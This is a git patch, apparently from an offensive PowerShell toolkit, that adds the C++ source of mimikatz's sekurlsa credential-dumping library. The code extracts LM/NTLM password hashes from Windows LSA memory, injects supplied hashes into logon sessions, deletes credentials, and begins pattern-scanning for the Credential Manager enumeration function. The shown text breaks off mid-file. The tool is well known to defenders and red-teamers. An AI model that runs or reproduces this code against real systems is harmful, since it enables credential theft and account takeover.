From 59cd18360764af6e6133ad11ec9cd8295372e587 Mon Sep 17 00:00:00 2001
From: clymb3r <bialek.joseph@gmail.com>
Date: Tue, 1 Oct 2013 09:47:05 -0700
Subject: Adding Invoke-Mimikatz and Invoke-Ninjacopy

---
 .../sekurlsa/Security Packages/msv1_0.cpp          | 153 +++++++
 .../librairies/sekurlsa/Security Packages/msv1_0.h |  16 +
 .../sekurlsa/Security Packages/msv1_0_helper.cpp   |  53 +++
 .../sekurlsa/Security Packages/msv1_0_helper.h     |  28 ++
 .../librairies/sekurlsa/Win32/CL.read.1.tlog       | Bin 0 -> 365578 bytes
 .../librairies/sekurlsa/Win32/CL.write.1.tlog      | Bin 0 -> 10972 bytes
 .../librairies/sekurlsa/Win32/cl.command.1.tlog    | Bin 0 -> 17846 bytes
 .../sekurlsa/Win32/link-cvtres.read.1.tlog         |   1 +
 .../sekurlsa/Win32/link-cvtres.write.1.tlog        |   1 +
 .../librairies/sekurlsa/Win32/link.command.1.tlog  | Bin 0 -> 4788 bytes
 .../librairies/sekurlsa/Win32/link.read.1.tlog     | Bin 0 -> 8124 bytes
 .../librairies/sekurlsa/Win32/link.write.1.tlog    | Bin 0 -> 3458 bytes
 .../librairies/sekurlsa/Win32/mt.command.1.tlog    | Bin 0 -> 958 bytes
 .../librairies/sekurlsa/Win32/mt.read.1.tlog       | Bin 0 -> 1116 bytes
 .../librairies/sekurlsa/Win32/mt.write.1.tlog      | Bin 0 -> 596 bytes
 .../librairies/sekurlsa/Win32/rc.command.1.tlog    | Bin 0 -> 672 bytes
 .../librairies/sekurlsa/Win32/rc.read.1.tlog       | Bin 0 -> 2544 bytes
 .../librairies/sekurlsa/Win32/rc.write.1.tlog      | Bin 0 -> 398 bytes
 .../Win32/sekurlsa.dll.intermediate.manifest       |  10 +
 .../sekurlsa/Win32/sekurlsa.lastbuildstate         |   2 +
 .../librairies/sekurlsa/Win32/sekurlsa.res         | Bin 0 -> 752 bytes
 .../sekurlsa/Win32/sekurlsa.write.1.tlog           |   5 +
 .../librairies/sekurlsa/modules/credman.cpp        | 180 ++++++++
 .../librairies/sekurlsa/modules/credman.h          |  19 +
 .../librairies/sekurlsa/modules/incognito.cpp      |  88 ++++
 .../librairies/sekurlsa/modules/incognito.h        |  13 +
 .../librairies/sekurlsa/modules/sam.cpp            | 479 +++++++++++++++++++++
 .../mimikatz-1.0/librairies/sekurlsa/modules/sam.h | 210 +++++++++
 .../librairies/sekurlsa/modules/secrets.cpp        |  99 +++++
 .../librairies/sekurlsa/modules/secrets.h          |  29 ++
 .../mimikatz-1.0/librairies/sekurlsa/sekurlsa.cpp  |  86 ++++
 .../mimikatz-1.0/librairies/sekurlsa/sekurlsa.h    |  23 +
 .../mimikatz-1.0/librairies/sekurlsa/sekurlsa.rc   | Bin 0 -> 1878 bytes
 .../librairies/sekurlsa/sekurlsa.vcxproj           | 154 +++++++
 .../librairies/sekurlsa/sekurlsa.vcxproj.filters   | 122 ++++++
 35 files changed, 1771 insertions(+)
 create mode 100644 Exfiltration/mimikatz-1.0/librairies/sekurlsa/Security Packages/msv1_0.cpp
 create mode 100644 Exfiltration/mimikatz-1.0/librairies/sekurlsa/Security Packages/msv1_0.h
 create mode 100644 Exfiltration/mimikatz-1.0/librairies/sekurlsa/Security Packages/msv1_0_helper.cpp
 create mode 100644 Exfiltration/mimikatz-1.0/librairies/sekurlsa/Security Packages/msv1_0_helper.h
 create mode 100644 Exfiltration/mimikatz-1.0/librairies/sekurlsa/Win32/CL.read.1.tlog
 create mode 100644 Exfiltration/mimikatz-1.0/librairies/sekurlsa/Win32/CL.write.1.tlog
 create mode 100644 Exfiltration/mimikatz-1.0/librairies/sekurlsa/Win32/cl.command.1.tlog
 create mode 100644 Exfiltration/mimikatz-1.0/librairies/sekurlsa/Win32/link-cvtres.read.1.tlog
 create mode 100644 Exfiltration/mimikatz-1.0/librairies/sekurlsa/Win32/link-cvtres.write.1.tlog
 create mode 100644 Exfiltration/mimikatz-1.0/librairies/sekurlsa/Win32/link.command.1.tlog
 create mode 100644 Exfiltration/mimikatz-1.0/librairies/sekurlsa/Win32/link.read.1.tlog
 create mode 100644 Exfiltration/mimikatz-1.0/librairies/sekurlsa/Win32/link.write.1.tlog
 create mode 100644 Exfiltration/mimikatz-1.0/librairies/sekurlsa/Win32/mt.command.1.tlog
 create mode 100644 Exfiltration/mimikatz-1.0/librairies/sekurlsa/Win32/mt.read.1.tlog
 create mode 100644 Exfiltration/mimikatz-1.0/librairies/sekurlsa/Win32/mt.write.1.tlog
 create mode 100644 Exfiltration/mimikatz-1.0/librairies/sekurlsa/Win32/rc.command.1.tlog
 create mode 100644 Exfiltration/mimikatz-1.0/librairies/sekurlsa/Win32/rc.read.1.tlog
 create mode 100644 Exfiltration/mimikatz-1.0/librairies/sekurlsa/Win32/rc.write.1.tlog
 create mode 100644 Exfiltration/mimikatz-1.0/librairies/sekurlsa/Win32/sekurlsa.dll.intermediate.manifest
 create mode 100644 Exfiltration/mimikatz-1.0/librairies/sekurlsa/Win32/sekurlsa.lastbuildstate
 create mode 100644 Exfiltration/mimikatz-1.0/librairies/sekurlsa/Win32/sekurlsa.res
 create mode 100644 Exfiltration/mimikatz-1.0/librairies/sekurlsa/Win32/sekurlsa.write.1.tlog
 create mode 100644 Exfiltration/mimikatz-1.0/librairies/sekurlsa/modules/credman.cpp
 create mode 100644 Exfiltration/mimikatz-1.0/librairies/sekurlsa/modules/credman.h
 create mode 100644 Exfiltration/mimikatz-1.0/librairies/sekurlsa/modules/incognito.cpp
 create mode 100644 Exfiltration/mimikatz-1.0/librairies/sekurlsa/modules/incognito.h
 create mode 100644 Exfiltration/mimikatz-1.0/librairies/sekurlsa/modules/sam.cpp
 create mode 100644 Exfiltration/mimikatz-1.0/librairies/sekurlsa/modules/sam.h
 create mode 100644 Exfiltration/mimikatz-1.0/librairies/sekurlsa/modules/secrets.cpp
 create mode 100644 Exfiltration/mimikatz-1.0/librairies/sekurlsa/modules/secrets.h
 create mode 100644 Exfiltration/mimikatz-1.0/librairies/sekurlsa/sekurlsa.cpp
 create mode 100644 Exfiltration/mimikatz-1.0/librairies/sekurlsa/sekurlsa.h
 create mode 100644 Exfiltration/mimikatz-1.0/librairies/sekurlsa/sekurlsa.rc
 create mode 100644 Exfiltration/mimikatz-1.0/librairies/sekurlsa/sekurlsa.vcxproj
 create mode 100644 Exfiltration/mimikatz-1.0/librairies/sekurlsa/sekurlsa.vcxproj.filters

(limited to 'Exfiltration/mimikatz-1.0/librairies/sekurlsa')

diff --git a/Exfiltration/mimikatz-1.0/librairies/sekurlsa/Security Packages/msv1_0.cpp b/Exfiltration/mimikatz-1.0/librairies/sekurlsa/Security Packages/msv1_0.cpp
new file mode 100644
index 0000000..b429e5a
--- /dev/null
+++ b/Exfiltration/mimikatz-1.0/librairies/sekurlsa/Security Packages/msv1_0.cpp	
@@ -0,0 +1,153 @@
+/*	Benjamin DELPY `gentilkiwi`
+	http://blog.gentilkiwi.com
+	benjamin@gentilkiwi.com
+	Licence    : http://creativecommons.org/licenses/by/3.0/fr/
+	Ce fichier : http://creativecommons.org/licenses/by/3.0/fr/
+*/
+#include "msv1_0.h"
+
+bool searchMSVFuncs()
+{
+	if(!MSV1_0_MspAuthenticationPackageId)
+			MSV1_0_MspAuthenticationPackageId = (mod_system::GLOB_Version.dwBuildNumber < 7000) ? 2 : 3;
+	return (searchLSAFuncs() && (MSV1_0_MspAuthenticationPackageId != 0));
+}
+
+bool WINAPI getMSVLogonData(__in PLUID logId, __in mod_pipe * monPipe, __in bool justSecurity)
+{
+	wostringstream maReponse;
+	if(searchMSVFuncs())
+	{
+		unsigned short reservedSize = 0;
+		PMSV1_0_PRIMARY_CREDENTIAL kiwiCreds = NULL;
+		if(NT_SUCCESS(NlpGetPrimaryCredential(logId, &kiwiCreds, &reservedSize)))
+		{
+			wstring lmHash = mod_text::stringOfHex(kiwiCreds->LmOwfPassword, sizeof(kiwiCreds->LmOwfPassword));
+			wstring ntHash = mod_text::stringOfHex(kiwiCreds->NtOwfPassword, sizeof(kiwiCreds->NtOwfPassword));
+
+			if(justSecurity)
+				maReponse << L"lm{ " << lmHash << L" }, ntlm{ " << ntHash << L" }";
+			else
+			{
+				maReponse << endl <<
+					L"\t * Utilisateur  : " << mod_text::stringOfSTRING(kiwiCreds->UserName) << endl <<
+					L"\t * Domaine      : " << mod_text::stringOfSTRING(kiwiCreds->LogonDomainName) << endl <<
+					L"\t * Hash LM      : " << lmHash << endl <<
+					L"\t * Hash NTLM    : " << ntHash;
+			}
+			SeckPkgFunctionTable->FreeLsaHeap(kiwiCreds);
+		}
+		else maReponse << L"n.t. (LUID KO)";
+	}
+	else maReponse << L"n.a. (msv KO)";
+
+	return sendTo(monPipe, maReponse.str());
+}
+
+__kextdll bool __cdecl getLogonSessions(mod_pipe * monPipe, vector<wstring> * mesArguments)
+{
+	vector<pair<PFN_ENUM_BY_LUID, wstring>> monProvider;
+	monProvider.push_back(make_pair<PFN_ENUM_BY_LUID, wstring>(getMSVLogonData, wstring(L"msv1_0")));
+	return getLogonData(monPipe, mesArguments, &monProvider);
+}
+
+__kextdll bool __cdecl delLogonSession(mod_pipe * monPipe, vector<wstring> * mesArguments)
+{
+	wostringstream maReponse;
+	if(searchMSVFuncs())
+	{
+		if(!mesArguments->empty() && mesArguments->size() >= 1 && mesArguments->size() <= 2)
+		{
+			wstring idSecAppHigh = L"0";
+			wstring idSecAppLow = mesArguments->front();
+			if(mesArguments->size() > 1)
+			{
+				idSecAppHigh = mesArguments->front(); idSecAppLow = mesArguments->back();
+			}
+
+			LUID idApp = mod_text::wstringsToLUID(idSecAppHigh, idSecAppLow);
+			if(idApp.LowPart != 0 || idApp.HighPart != 0)
+				maReponse << (NT_SUCCESS(NlpDeletePrimaryCredential(&idApp)) ? L"Suppression des données de sécurité réussie :)" : L"Suppression des données de sécurité en échec :(");
+			else maReponse << L"LUID incorrect !";
+		}
+		else maReponse << L"Format d\'appel invalide : delLogonSession [idSecAppHigh] idSecAppLow";
+	}
+	else maReponse << L"n.a. (msv KO)";
+
+	maReponse << endl;
+	return sendTo(monPipe, maReponse.str());
+}
+
+__kextdll bool __cdecl addLogonSession(mod_pipe * monPipe, vector<wstring> * mesArguments)
+{
+	wostringstream maReponse;
+	if(searchMSVFuncs())
+	{
+		if(!mesArguments->empty() && mesArguments->size() >= 4 && mesArguments->size() <= 6)
+		{
+			MSV1_0_PRIMARY_CREDENTIAL kiwicreds;
+			RtlZeroMemory(&kiwicreds, sizeof(MSV1_0_PRIMARY_CREDENTIAL));
+			
+			wstring idSecAppHigh = L"0", idSecAppLow, userName, domainName, lmHash, ntlmHash = mesArguments->back();
+			kiwicreds.LmPasswordPresent = FALSE;
+			kiwicreds.NtPasswordPresent = TRUE;
+
+			switch(mesArguments->size()) // méchants arguments utilisateurs
+			{
+			case 4:
+				idSecAppLow = mesArguments->front();
+				userName = mesArguments->at(1);
+				domainName = mesArguments->at(2);
+				break;
+			case 6:
+				idSecAppHigh = mesArguments->front();
+				idSecAppLow = mesArguments->at(1);
+				userName = mesArguments->at(2);
+				domainName = mesArguments->at(3);
+				kiwicreds.LmPasswordPresent = TRUE;
+				lmHash = mesArguments->at(4);
+				break;
+			case 5:
+				if(mesArguments->at(3).size() == 0x20)
+				{
+					idSecAppLow = mesArguments->front();
+					userName = mesArguments->at(1);
+					domainName = mesArguments->at(2);
+					kiwicreds.LmPasswordPresent = TRUE;
+					lmHash = mesArguments->at(3);
+				}
+				else
+				{
+					idSecAppHigh = mesArguments->front();
+					idSecAppLow = mesArguments->at(1);
+					userName = mesArguments->at(2);
+					domainName = mesArguments->at(3);
+				}
+				break;
+			}
+
+			LUID idApp = mod_text::wstringsToLUID(idSecAppHigh, idSecAppLow);
+
+			if(idApp.LowPart != 0 || idApp.HighPart != 0)
+			{
+				if((!kiwicreds.LmPasswordPresent || (lmHash.size() == 0x20)) && ntlmHash.size() == 0x20 && userName.size() <= MAX_USERNAME_LEN && domainName.size() <= MAX_DOMAIN_LEN)
+				{
+					mod_text::InitLsaStringToBuffer(&kiwicreds.UserName, userName, kiwicreds.BuffUserName);
+					mod_text::InitLsaStringToBuffer(&kiwicreds.LogonDomainName, domainName, kiwicreds.BuffDomaine);
+					if(kiwicreds.LmPasswordPresent)
+						mod_text::wstringHexToByte(lmHash, kiwicreds.LmOwfPassword);
+					mod_text::wstringHexToByte(ntlmHash, kiwicreds.NtOwfPassword);
+
+					maReponse << (NT_SUCCESS(NlpAddPrimaryCredential(&idApp, &kiwicreds, sizeof(kiwicreds))) ? L"Injection de données de sécurité réussie :)" : L"Injection de données de sécurité en échec :(");
+				}
+				else maReponse << L"Les hashs LM et NTLM doivent faire 32 caractères, le nom d\'utilisateur et le domaine/poste au maximum 22 caractères";
+			}
+			else maReponse << L"LUID incorrect !";
+		}
+		else maReponse << L"Format d\'appel invalide : addLogonSession [idSecAppHigh] idSecAppLow Utilisateur {Domaine|Poste} [HashLM] HashNTLM";
+	}
+	else maReponse << L"n.a. (msv KO)";
+
+	maReponse << endl;
+	return sendTo(monPipe, maReponse.str());
+}
diff --git a/Exfiltration/mimikatz-1.0/librairies/sekurlsa/Security Packages/msv1_0.h b/Exfiltration/mimikatz-1.0/librairies/sekurlsa/Security Packages/msv1_0.h
new file mode 100644
index 0000000..4749573
--- /dev/null
+++ b/Exfiltration/mimikatz-1.0/librairies/sekurlsa/Security Packages/msv1_0.h	
@@ -0,0 +1,16 @@
+/*	Benjamin DELPY `gentilkiwi`
+	http://blog.gentilkiwi.com
+	benjamin@gentilkiwi.com
+	Licence    : http://creativecommons.org/licenses/by/3.0/fr/
+	Ce fichier : http://creativecommons.org/licenses/by/3.0/fr/
+*/
+#pragma once
+#include "../sekurlsa.h"
+#include "msv1_0_helper.h"
+
+bool searchMSVFuncs();
+bool WINAPI getMSVLogonData(__in PLUID logId, __in mod_pipe * monPipe, __in bool justSecurity);
+
+__kextdll bool __cdecl getLogonSessions(mod_pipe * monPipe, vector<wstring> * mesArguments);
+__kextdll bool __cdecl delLogonSession(mod_pipe * monPipe, vector<wstring> * mesArguments);
+__kextdll bool __cdecl addLogonSession(mod_pipe * monPipe, vector<wstring> * mesArguments);
diff --git a/Exfiltration/mimikatz-1.0/librairies/sekurlsa/Security Packages/msv1_0_helper.cpp b/Exfiltration/mimikatz-1.0/librairies/sekurlsa/Security Packages/msv1_0_helper.cpp
new file mode 100644
index 0000000..7ccb8e5
--- /dev/null
+++ b/Exfiltration/mimikatz-1.0/librairies/sekurlsa/Security Packages/msv1_0_helper.cpp	
@@ -0,0 +1,53 @@
+/*	Benjamin DELPY `gentilkiwi`
+	http://blog.gentilkiwi.com
+	benjamin@gentilkiwi.com
+	Licence    : http://creativecommons.org/licenses/by/3.0/fr/
+	Ce fichier : http://creativecommons.org/licenses/by/3.0/fr/
+*/
+#include "msv1_0_helper.h"
+DWORD MSV1_0_MspAuthenticationPackageId = 0;
+
+void NlpMakeRelativeOrAbsoluteString(PVOID BaseAddress, PLSA_UNICODE_STRING String, bool relative)
+{
+	if(String->Buffer)
+		String->Buffer = reinterpret_cast<wchar_t *>(reinterpret_cast<ULONG_PTR>(String->Buffer) + ((relative ? -1 : 1) * reinterpret_cast<ULONG_PTR>(BaseAddress)));
+}
+
+NTSTATUS NlpAddPrimaryCredential(PLUID LogonId, PMSV1_0_PRIMARY_CREDENTIAL Credential, unsigned short CredentialSize)
+{
+	STRING PrimaryKeyValue, CredentialString;
+	mod_text::RtlInitString(&PrimaryKeyValue, MSV1_0_PRIMARY_KEY);
+
+	NlpMakeRelativeOrAbsoluteString(Credential, &Credential->UserName);
+	NlpMakeRelativeOrAbsoluteString(Credential, &Credential->LogonDomainName);
+	CredentialString.Buffer = reinterpret_cast<char *>(Credential);
+	CredentialString.MaximumLength = CredentialString.Length = CredentialSize;
+	SeckPkgFunctionTable->LsaProtectMemory(CredentialString.Buffer, CredentialString.Length);
+	return SeckPkgFunctionTable->AddCredential(LogonId, MSV1_0_MspAuthenticationPackageId, &PrimaryKeyValue, &CredentialString );
+}
+
+NTSTATUS NlpGetPrimaryCredential(PLUID LogonId, PMSV1_0_PRIMARY_CREDENTIAL *Credential, unsigned short *CredentialSize)
+{
+	ULONG QueryContext = 0, PrimaryKeyLength;
+	STRING PrimaryKeyValue, CredentialString;
+	mod_text::RtlInitString(&PrimaryKeyValue, MSV1_0_PRIMARY_KEY);
+			
+	NTSTATUS retour = SeckPkgFunctionTable->GetCredentials(LogonId, MSV1_0_MspAuthenticationPackageId, &QueryContext, FALSE, &PrimaryKeyValue, &PrimaryKeyLength, &CredentialString);
+	if(NT_SUCCESS(retour))
+	{
+		SeckPkgFunctionTable->LsaUnprotectMemory(CredentialString.Buffer, CredentialString.Length);
+		*Credential = (PMSV1_0_PRIMARY_CREDENTIAL) CredentialString.Buffer;
+		NlpMakeRelativeOrAbsoluteString(*Credential, &((*Credential)->UserName), false);
+		NlpMakeRelativeOrAbsoluteString(*Credential, &((*Credential)->LogonDomainName), false);
+		if (CredentialSize)
+			*CredentialSize = CredentialString.Length;
+	}
+	return retour;
+}
+
+NTSTATUS NlpDeletePrimaryCredential(PLUID LogonId)
+{
+	STRING PrimaryKeyValue;
+	mod_text::RtlInitString(&PrimaryKeyValue, MSV1_0_PRIMARY_KEY);
+	return SeckPkgFunctionTable->DeleteCredential(LogonId, MSV1_0_MspAuthenticationPackageId, &PrimaryKeyValue);
+}
\ No newline at end of file
diff --git a/Exfiltration/mimikatz-1.0/librairies/sekurlsa/Security Packages/msv1_0_helper.h b/Exfiltration/mimikatz-1.0/librairies/sekurlsa/Security Packages/msv1_0_helper.h
new file mode 100644
index 0000000..e9afd03
--- /dev/null
+++ b/Exfiltration/mimikatz-1.0/librairies/sekurlsa/Security Packages/msv1_0_helper.h	
@@ -0,0 +1,28 @@
+/*	Benjamin DELPY `gentilkiwi`
+	http://blog.gentilkiwi.com
+	benjamin@gentilkiwi.com
+	Licence    : http://creativecommons.org/licenses/by/3.0/fr/
+	Ce fichier : http://creativecommons.org/licenses/by/3.0/fr/
+*/
+#pragma once
+#include "../sekurlsa.h"
+
+#define MSV1_0_PRIMARY_KEY "Primary" 
+extern DWORD MSV1_0_MspAuthenticationPackageId;
+
+typedef struct _MSV1_0_PRIMARY_CREDENTIAL { 
+	LSA_UNICODE_STRING LogonDomainName; 
+	LSA_UNICODE_STRING UserName; 
+	BYTE NtOwfPassword[0x10];
+	BYTE LmOwfPassword[0x10];
+	BOOLEAN NtPasswordPresent; 
+	BOOLEAN LmPasswordPresent;
+	wchar_t BuffDomaine[MAX_DOMAIN_LEN];
+	wchar_t BuffUserName[MAX_USERNAME_LEN];
+} MSV1_0_PRIMARY_CREDENTIAL, *PMSV1_0_PRIMARY_CREDENTIAL; 
+
+void NlpMakeRelativeOrAbsoluteString(PVOID BaseAddress, PLSA_UNICODE_STRING String, bool relative = true);
+
+NTSTATUS NlpAddPrimaryCredential(PLUID LogonId, PMSV1_0_PRIMARY_CREDENTIAL Credential, unsigned short  CredentialSize);  
+NTSTATUS NlpGetPrimaryCredential(PLUID LogonId, PMSV1_0_PRIMARY_CREDENTIAL *Credential, unsigned short *CredentialSize);
+NTSTATUS NlpDeletePrimaryCredential(PLUID LogonId);
diff --git a/Exfiltration/mimikatz-1.0/librairies/sekurlsa/Win32/CL.read.1.tlog b/Exfiltration/mimikatz-1.0/librairies/sekurlsa/Win32/CL.read.1.tlog
new file mode 100644
index 0000000..af1843d
Binary files /dev/null and b/Exfiltration/mimikatz-1.0/librairies/sekurlsa/Win32/CL.read.1.tlog differ
diff --git a/Exfiltration/mimikatz-1.0/librairies/sekurlsa/Win32/CL.write.1.tlog b/Exfiltration/mimikatz-1.0/librairies/sekurlsa/Win32/CL.write.1.tlog
new file mode 100644
index 0000000..065c191
Binary files /dev/null and b/Exfiltration/mimikatz-1.0/librairies/sekurlsa/Win32/CL.write.1.tlog differ
diff --git a/Exfiltration/mimikatz-1.0/librairies/sekurlsa/Win32/cl.command.1.tlog b/Exfiltration/mimikatz-1.0/librairies/sekurlsa/Win32/cl.command.1.tlog
new file mode 100644
index 0000000..662e27d
Binary files /dev/null and b/Exfiltration/mimikatz-1.0/librairies/sekurlsa/Win32/cl.command.1.tlog differ
diff --git a/Exfiltration/mimikatz-1.0/librairies/sekurlsa/Win32/link-cvtres.read.1.tlog b/Exfiltration/mimikatz-1.0/librairies/sekurlsa/Win32/link-cvtres.read.1.tlog
new file mode 100644
index 0000000..46b134b
--- /dev/null
+++ b/Exfiltration/mimikatz-1.0/librairies/sekurlsa/Win32/link-cvtres.read.1.tlog
@@ -0,0 +1 @@
+ÿþ
\ No newline at end of file
diff --git a/Exfiltration/mimikatz-1.0/librairies/sekurlsa/Win32/link-cvtres.write.1.tlog b/Exfiltration/mimikatz-1.0/librairies/sekurlsa/Win32/link-cvtres.write.1.tlog
new file mode 100644
index 0000000..46b134b
--- /dev/null
+++ b/Exfiltration/mimikatz-1.0/librairies/sekurlsa/Win32/link-cvtres.write.1.tlog
@@ -0,0 +1 @@
+ÿþ
\ No newline at end of file
diff --git a/Exfiltration/mimikatz-1.0/librairies/sekurlsa/Win32/link.command.1.tlog b/Exfiltration/mimikatz-1.0/librairies/sekurlsa/Win32/link.command.1.tlog
new file mode 100644
index 0000000..8bfc485
Binary files /dev/null and b/Exfiltration/mimikatz-1.0/librairies/sekurlsa/Win32/link.command.1.tlog differ
diff --git a/Exfiltration/mimikatz-1.0/librairies/sekurlsa/Win32/link.read.1.tlog b/Exfiltration/mimikatz-1.0/librairies/sekurlsa/Win32/link.read.1.tlog
new file mode 100644
index 0000000..a090f02
Binary files /dev/null and b/Exfiltration/mimikatz-1.0/librairies/sekurlsa/Win32/link.read.1.tlog differ
diff --git a/Exfiltration/mimikatz-1.0/librairies/sekurlsa/Win32/link.write.1.tlog b/Exfiltration/mimikatz-1.0/librairies/sekurlsa/Win32/link.write.1.tlog
new file mode 100644
index 0000000..3c62e5a
Binary files /dev/null and b/Exfiltration/mimikatz-1.0/librairies/sekurlsa/Win32/link.write.1.tlog differ
diff --git a/Exfiltration/mimikatz-1.0/librairies/sekurlsa/Win32/mt.command.1.tlog b/Exfiltration/mimikatz-1.0/librairies/sekurlsa/Win32/mt.command.1.tlog
new file mode 100644
index 0000000..a61d64e
Binary files /dev/null and b/Exfiltration/mimikatz-1.0/librairies/sekurlsa/Win32/mt.command.1.tlog differ
diff --git a/Exfiltration/mimikatz-1.0/librairies/sekurlsa/Win32/mt.read.1.tlog b/Exfiltration/mimikatz-1.0/librairies/sekurlsa/Win32/mt.read.1.tlog
new file mode 100644
index 0000000..c2411f0
Binary files /dev/null and b/Exfiltration/mimikatz-1.0/librairies/sekurlsa/Win32/mt.read.1.tlog differ
diff --git a/Exfiltration/mimikatz-1.0/librairies/sekurlsa/Win32/mt.write.1.tlog b/Exfiltration/mimikatz-1.0/librairies/sekurlsa/Win32/mt.write.1.tlog
new file mode 100644
index 0000000..0c67d61
Binary files /dev/null and b/Exfiltration/mimikatz-1.0/librairies/sekurlsa/Win32/mt.write.1.tlog differ
diff --git a/Exfiltration/mimikatz-1.0/librairies/sekurlsa/Win32/rc.command.1.tlog b/Exfiltration/mimikatz-1.0/librairies/sekurlsa/Win32/rc.command.1.tlog
new file mode 100644
index 0000000..52d7b3d
Binary files /dev/null and b/Exfiltration/mimikatz-1.0/librairies/sekurlsa/Win32/rc.command.1.tlog differ
diff --git a/Exfiltration/mimikatz-1.0/librairies/sekurlsa/Win32/rc.read.1.tlog b/Exfiltration/mimikatz-1.0/librairies/sekurlsa/Win32/rc.read.1.tlog
new file mode 100644
index 0000000..465eb7a
Binary files /dev/null and b/Exfiltration/mimikatz-1.0/librairies/sekurlsa/Win32/rc.read.1.tlog differ
diff --git a/Exfiltration/mimikatz-1.0/librairies/sekurlsa/Win32/rc.write.1.tlog b/Exfiltration/mimikatz-1.0/librairies/sekurlsa/Win32/rc.write.1.tlog
new file mode 100644
index 0000000..9befde9
Binary files /dev/null and b/Exfiltration/mimikatz-1.0/librairies/sekurlsa/Win32/rc.write.1.tlog differ
diff --git a/Exfiltration/mimikatz-1.0/librairies/sekurlsa/Win32/sekurlsa.dll.intermediate.manifest b/Exfiltration/mimikatz-1.0/librairies/sekurlsa/Win32/sekurlsa.dll.intermediate.manifest
new file mode 100644
index 0000000..ecea6f7
--- /dev/null
+++ b/Exfiltration/mimikatz-1.0/librairies/sekurlsa/Win32/sekurlsa.dll.intermediate.manifest
@@ -0,0 +1,10 @@
+<?xml version='1.0' encoding='UTF-8' standalone='yes'?>
+<assembly xmlns='urn:schemas-microsoft-com:asm.v1' manifestVersion='1.0'>
+  <trustInfo xmlns="urn:schemas-microsoft-com:asm.v3">
+    <security>
+      <requestedPrivileges>
+        <requestedExecutionLevel level='asInvoker' uiAccess='false' />
+      </requestedPrivileges>
+    </security>
+  </trustInfo>
+</assembly>
diff --git a/Exfiltration/mimikatz-1.0/librairies/sekurlsa/Win32/sekurlsa.lastbuildstate b/Exfiltration/mimikatz-1.0/librairies/sekurlsa/Win32/sekurlsa.lastbuildstate
new file mode 100644
index 0000000..4d28193
--- /dev/null
+++ b/Exfiltration/mimikatz-1.0/librairies/sekurlsa/Win32/sekurlsa.lastbuildstate
@@ -0,0 +1,2 @@
+#v4.0:v100
+Release|Win32|C:\Github\PowerShellExperimental\Invoke-Mimikatz\mimikatz-1.0\|
diff --git a/Exfiltration/mimikatz-1.0/librairies/sekurlsa/Win32/sekurlsa.res b/Exfiltration/mimikatz-1.0/librairies/sekurlsa/Win32/sekurlsa.res
new file mode 100644
index 0000000..d0ba1dd
Binary files /dev/null and b/Exfiltration/mimikatz-1.0/librairies/sekurlsa/Win32/sekurlsa.res differ
diff --git a/Exfiltration/mimikatz-1.0/librairies/sekurlsa/Win32/sekurlsa.write.1.tlog b/Exfiltration/mimikatz-1.0/librairies/sekurlsa/Win32/sekurlsa.write.1.tlog
new file mode 100644
index 0000000..929c472
--- /dev/null
+++ b/Exfiltration/mimikatz-1.0/librairies/sekurlsa/Win32/sekurlsa.write.1.tlog
@@ -0,0 +1,5 @@
+^C:\Github\PowerShellExperimental\Invoke-Mimikatz\mimikatz-1.0\librairies\sekurlsa\sekurlsa.vcxproj
+C:\Github\PowerShellExperimental\Invoke-Mimikatz\mimikatz-1.0\Win32\sekurlsa.lib
+C:\Github\PowerShellExperimental\Invoke-Mimikatz\mimikatz-1.0\Win32\sekurlsa.lib
+C:\Github\PowerShellExperimental\Invoke-Mimikatz\mimikatz-1.0\Win32\sekurlsa.exp
+C:\Github\PowerShellExperimental\Invoke-Mimikatz\mimikatz-1.0\Win32\sekurlsa.exp
diff --git a/Exfiltration/mimikatz-1.0/librairies/sekurlsa/modules/credman.cpp b/Exfiltration/mimikatz-1.0/librairies/sekurlsa/modules/credman.cpp
new file mode 100644
index 0000000..fe846b4
--- /dev/null
+++ b/Exfiltration/mimikatz-1.0/librairies/sekurlsa/modules/credman.cpp
@@ -0,0 +1,180 @@
+/*	Benjamin DELPY `gentilkiwi`
+	http://blog.gentilkiwi.com
+	benjamin@gentilkiwi.com
+	Licence    : http://creativecommons.org/licenses/by/3.0/fr/
+	Ce fichier : http://creativecommons.org/licenses/by/3.0/fr/
+*/
+#include "credman.h"
+
+PCRED_I_ENUMERATE CredIEnumerate = NULL;
+
+bool searchCredmanFuncs()
+{
+#ifdef _M_X64
+	BYTE PTRN_WIN5_CrediEnumerate[]	= {0x48, 0x8b, 0xc4, 0x48, 0x81, 0xec, 0xb8, 0x00, 0x00, 0x00, 0x48, 0x89, 0x70, 0xe8, 0x48, 0x89, 0x78, 0xe0, 0x4c, 0x89, 0x60, 0xd8, 0x45, 0x33, 0xe4};
+	LONG OFFS_WIN5_CrediEnumerate	= 0;
+	BYTE PTRN_WNO8_CrediEnumerate[]	= {0x48, 0x81, 0xec, 0xd0, 0x00, 0x00, 0x00, 0x33, 0xc0, 0x45, 0x33, 0xed};
+	LONG OFFS_WNO8_CrediEnumerate	= -22;
+	BYTE PTRN_WIN8_CrediEnumerate[]	= {0x48, 0x81, 0xec, 0xe0, 0x00, 0x00, 0x00, 0x33, 0xc0, 0x45, 0x33, 0xed};
+	LONG OFFS_WIN8_CrediEnumerate	= -30;
+#elif defined _M_IX86
+	BYTE PTRN_WIN5_CrediEnumerate[]	= {0x8b, 0xff, 0x55, 0x8b, 0xec, 0x83, 0xec, 0x24, 0x53, 0x33, 0xdb, 0x57, 0x33, 0xc0};
+	BYTE PTRN_WN60_CrediEnumerate[]	= {0x8b, 0xff, 0x55, 0x8b, 0xec, 0x83, 0xec, 0x40, 0x33, 0xc9};
+	BYTE PTRN_WN61_CrediEnumerate[]	= {0x8b, 0xff, 0x55, 0x8b, 0xec, 0x83, 0xec, 0x44, 0x33, 0xc0};
+	BYTE PTRN_WN62_CrediEnumerate[]	= {0x8b, 0xff, 0x55, 0x8b, 0xec, 0x81, 0xec, 0x80, 0x00, 0x00, 0x00, 0x33, 0xc0};
+	LONG OFFS_WALL_CrediEnumerate	= 0;
+#endif
+
+	if(!CredIEnumerate)
+	{
+		PBYTE pattern = NULL; ULONG taille = 0; LONG offset = 0;
+#ifdef _M_X64
+		if(mod_system::GLOB_Version.dwMajorVersion < 6)
+		{
+			pattern	= PTRN_WIN5_CrediEnumerate;
+			taille	= sizeof(PTRN_WIN5_CrediEnumerate);
+			offset	= OFFS_WIN5_CrediEnumerate;
+		}
+		else
+		{
+			if (mod_system::GLOB_Version.dwMinorVersion < 2)
+			{
+				pattern	= PTRN_WNO8_CrediEnumerate;
+				taille	= sizeof(PTRN_WNO8_CrediEnumerate);
